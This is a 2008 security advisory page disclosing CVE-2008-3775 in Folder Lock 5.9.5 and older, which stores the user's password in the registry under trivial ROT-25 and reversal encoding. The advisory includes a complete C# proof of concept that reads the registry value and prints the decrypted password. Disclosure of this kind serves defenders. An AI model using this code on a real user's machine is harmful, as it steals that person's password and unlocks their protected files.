|
 |
| SecurityReason | ||
| WLB | ||
| RSS | ||
| Corporate | ||
| Services | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
| Details : SecurityAlert | ||||
 SecurityAlert : 4183 CVE : CVE-2008-3775 CWE : CWE-310 SecurityRisk : Low  (About) Remote Exploit : No Local Exploit : Yes Victim interaction required : No Exploit Given : No Credit : glafkos Published : 26.08.2008
Advisory Text : /* * Folder Lock <= 5.9.5 Local Password Information Disclosure * * Author(s): Charalambous Glafkos * George Nicolaou * Date: June 19, 2008 * Site: http://www.astalavista.com * Mail: glafkos (at) astalavista (dot) com [email concealed] * ishtus (at) astalavista (dot) com [email concealed] * * Synopsis: Folder Lock 5.9.5 and older versions are prone to local information-disclosure vulnerability. * Successfully exploiting this issue allows attackers to obtain potentially sensitive information that may aid in further attacks. * The security issue is caused due to the application storing access credentials within the Windows registry key: * (HKEY_CURRENT_USER\Software\Microsoft\Windows\QualityControl) without proper encryption. * This can be exploited to disclose the encrypted _pack password of the user which is ROT-25 and reversed. * * Sample Output: * * ASTALAVISTA the hacking & security community * Folder Lock <= 5.9.5 Decrypter v2.0 * --------------------------------- * Encrypted Password: :3<k_^62`4T- * Decrypted Password: ,S3_15]^j;29 * */ using System; using System.Text; using System.IO; using System.Threading; using Microsoft.Win32; namespace getRegistryValue { class getValue { static void Main() { getValue details = new getValue(); Console.WriteLine("\nASTALAVISTA the hacking & security community\n\n"); Console.WriteLine("Folder Lock <= 5.9.5 Decrypter v2.0"); Console.WriteLine("---------------------------------"); String strFL = details.getFL(); Console.WriteLine(strFL); Thread.Sleep(5000); } private string getFL() { RegistryKey FLKey = Registry.CurrentUser; FLKey = FLKey.OpenSubKey(@"Software\Microsoft\Windows\QualityControl", false); String _pack = FLKey.GetValue("_pack").ToString(); String strFL = "Encrypted Password: " + _pack.Replace("~", "") + "\nDecrypted Password: " + Reverse(Rotate(_pack.Replace("~", ""))) + "\n"; return strFL; } public string Reverse(string x) { char[] charArray = new char[x.Length]; int len = x.Length - 1; for (int i = 0; i <= len; i++) charArray[i] = x[len - i]; return new string(charArray); } public static string Rotate(string toRotate) { char[] charArray = toRotate.ToCharArray(); for (int i = 0; i < charArray.Length; i++) { int thisInt = (int)charArray[i]; if (thisInt >= 65 && thisInt <= 91) { thisInt += 25; if (thisInt >= 91) { thisInt -= 26; } } if (thisInt >= 92 && thisInt <= 96) { thisInt += 25; if (thisInt >= 96) { thisInt -= 26; } } if (thisInt >= 32 && thisInt <= 47) { thisInt += 25; if (thisInt >= 47) { thisInt -= 26; } } if (thisInt >= 48 && thisInt <= 57) { thisInt += 25; if (thisInt >= 57) { thisInt -= 26; } } if (thisInt >= 58 && thisInt <= 64) { thisInt += 25; if (thisInt >= 64) { thisInt -= 26; } } if (thisInt >= 97 && thisInt <= 123) { thisInt += 25; if (thisInt >= 123) { thisInt -= 26; } } charArray[i] = (char)thisInt; } return new string(charArray); } } } Best Regards, Charalambous Glafkos ( nowayout ) References : http://www.securityfocus.com/bid/30771 Feedback : If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com. |
||||
| Alert | ||
Microsoft VISTA TCP/IP stack buffer overflow
Microsoft Device IO Control wrapped by the iphlpapi.dll API shipping with Windows Vista 32 bit and 64 bit contains a possibly exploitable, buffer overflow corrupting kernel memory. |
||
| Apache |  |
|
» Apache Tomcat <= |
||
| PHP | |
|
» PHP |
||
- 2008-11-27| Copyright © SecurityReason. All Rights Reserved. |